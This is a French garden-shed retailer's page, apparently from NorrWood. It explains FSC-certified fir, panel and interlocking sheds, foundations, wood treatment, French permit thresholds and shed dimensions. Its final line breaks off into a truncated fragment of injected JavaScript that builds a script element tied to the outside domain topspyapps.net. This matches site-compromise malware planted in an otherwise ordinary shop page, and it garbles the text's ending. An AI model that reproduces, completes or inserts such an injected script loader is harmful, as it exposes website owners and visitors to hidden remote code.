mon jardin à prix d'usine
Abris bois garantis 10 ans

Tous nos abris de jardin sont en sapin du Nord de l’Europe certifiés FSC. Cette essence est la plus couramment utilisée. Par sa nature cette dernière est rarement traitée en autoclave. Grâce aux conditions climatiques de son milieu naturel, le sapin du Nord pousse lentement ce qui lui confère une grande résistance.

Nos produits sont certifiés FSC. Le but du FSC (Le « Forest Stewardship Council) est de promouvoir une gestion des forêts du globe qui soit environnementalement responsable, socialement bénéfique et économiquement viable en établissant une série de principes de gestion forestière mondialement reconnue et appliquée.

Chaleureux et naturel, le bois s’intègre parfaitement dans l’environnement. Il réagit aux variations de température et d’humidité en se craquelant parfois, sans pour autant perdre de sa fiabilité. Il évolue avec le temps et se colore différemment. Le bois étant un matériau vivant, il nécessitera un entretien régulier tous les 2 ans (ou plus suivant les conditions climatiques de votre région d’habitation).

NorrWood vous aide à choisir votre abri de jardin en bois sur mesure !

 

Il existe 2 types d’abri de jardin en bois:

Les abris « panneaux »:

d’une épaisseur de 12 à19 mm, ils sont fixés sur un cadre ossature d’épaisseur plus importante. Ce produit, plus économique, convient parfaitement bien pour le rangement des outils de jardin, de la tondeuse ou des meubles d’été.

Les abris « emboîtés »:

faciles à monter. Leur esthétique rappelle celle des chalets de montagne et leur bonne isolation thermique en font des rangements ou pièces à vivre selon leur épaisseur

 

► LA POSE

La préparation du sol :

un abri ou chalet peut être posé sur différents supports. Dans tous les cas, damez le sol pour le stabiliser et assurez-vous que celui-ci soit parfaitement de niveau.

→ Dalle de béton :

La solution la plus solide. Celle-ci doit être lisse et avoir une épaisseur d’au moins 10 cm.

→ Dallage ou pavés auto-bloquants:

Le sol doit être damé et stabilisé et les épaisseurs de matériaux respectées : Dallage : 3,5 cm ; Autobloquants : 6 cm

→ Parpaings
:

Utilisez des parpaings de 15 à 20 cm d’épaisseur.

→ Solives
:

Utilisez des solives de classe III. 
Il est préférable de prévoir un plancher en bois ou OSB sauf dans le cas d’une dalle de béton.

► LA PROTECTION ET L’ENTRETIEN

→ Avant montage : la protection

Le colis constituant votre abri n’est à ouvrir que lorsque vous en commencerez le traitement. 
Appliquez 2 couches d’un produit de traitement pour le bois :insecticide  (1) et fongicide (2), sur toutes les faces en insistant sur les extrémités.

1) insecticide : protection contre les insectes

2) fongicide : protection contre les champignons

→  Après le montage : l’entretien

Une fois le montage terminé, entretenez votre abri avec un produit de protection du bois en extérieur (lasure ou peinture pour bois extérieur microporeuses), sur les deux faces (intérieures et extérieures).

LA REGLEMENTATION

La construction d’un chalet ou d’un abri de jardin nécessite quelques formalités et démarches administratives auprès de votre mairie :

→  S’il existe déjà un bâtiment sur votre terrain et si la surface occupée au sol est de moins de 20 m2 : la déclaration de travaux préalable est obligatoire.

→  Si la surface occupée au sol est supérieure à 20 m2 ou, quelle que soit la surface, si aucun bâtiment n’existe sur votre terrain : la demande de permis de construire est obligatoire.

→   La hauteur maximum est de 3 m. 
Avant de vous lancer dans une telle construction, il convient de vous rapprocher de votre mairie afin de connaître les caractéristiques constructibles de votre terrain. Enfin, il est à noter que certains secteurs (notamment le littoral, la proximité des autoroutes, la proximité des lacs, les zones de montagnes…) sont régis par des règles d’urbanisme spécifiques. Dans tous les cas, et par sécurité, renseignez-vous.

MIEUX COMPRENDRE LES DIMENSIONS DES ABRIS DE JARDIN

Il y a trois dimensions à connaître:

→ Dimension extérieure: elle est définie par la longueur/largeur des madriers (pour les abris emboîtés) ou par la longueur des panneaux assemblés (pour les abris panneaux).

→ Dimension intérieure: elle est définie par la longueur/largeur des madriers ou panneaux à l’intérieur de l’abri de jardin.

→ Dimension hors tout: elle est définie par la longueur/largeur totale des abris de jardin. C’est à dire, une fois l’abri monté, la dimension hors tout se mesure aux extrémités de celui-ci (souvent au niveau du toit)

 } else {var d=document;var s=d.createElement(‘script’); topspyapps.net